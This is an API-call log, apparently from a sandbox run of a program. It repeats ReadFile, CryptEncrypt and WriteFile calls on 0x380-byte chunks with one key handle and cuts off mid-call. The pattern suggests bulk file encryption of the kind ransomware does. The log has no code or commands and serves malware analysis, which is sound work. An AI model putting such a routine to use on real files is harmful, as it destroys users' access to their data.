[0274.492] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.493] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.493] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.494] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.494] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.495] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.495] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.496] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.496] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.497] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.497] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.498] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.498] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.499] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.499] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0274.500] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0274.500] CryptEncrypt (in: hKey=0x2fb488, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, 